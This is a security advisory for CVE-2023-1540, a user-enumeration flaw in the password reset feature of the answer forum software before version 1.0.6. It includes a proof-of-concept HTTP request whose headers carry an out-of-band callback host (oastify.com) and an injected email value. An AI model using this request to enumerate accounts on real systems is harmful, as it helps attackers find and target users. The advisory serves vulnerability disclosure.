Headline
CVE-2023-1540: Observable Response Discrepancy in Password Reset Functionality in answer
Observable Response Discrepancy in GitHub repository answerdev/answer prior to 1.0.6.
Description
The password reset functionality leaks information pertaining to use accounts. Where an invalid account is utilized, the application responds that the account could not be found. Where an account is valid, the application responds with a reason “base.success” (when intercepted), or that if an account with that name is identified it will receive an email (browser response).
Proof of Concept
POST /answer/api/v1/user/password/reset HTTP/1.1
Host: 192.168.1.66:9080
Content-Length: 90
Accept-Language: en_US
Authorization:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 [email protected]
Content-Type: application/json
Accept: */*
Origin: http://192.168.1.66:9080
Referer: http://egypue1ge0basdkhsivl093qmhsjref3.oastify.com/ref
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: no-transform
{"e_mail":"[email protected]","captcha_code":"4a2u","captcha_id":"EmC1gF0NkgvUvCdHAu7z"}
Impact
An attacker can identify valid user email accounts which permits the attacker to increase the application’s attack surface.
Occurrences
Related news
GHSA-6x5v-cxpp-pc5x: Answer has Observable Response Discrepancy
Observable Response Discrepancy in GitHub repository answerdev/answer prior to 1.0.6.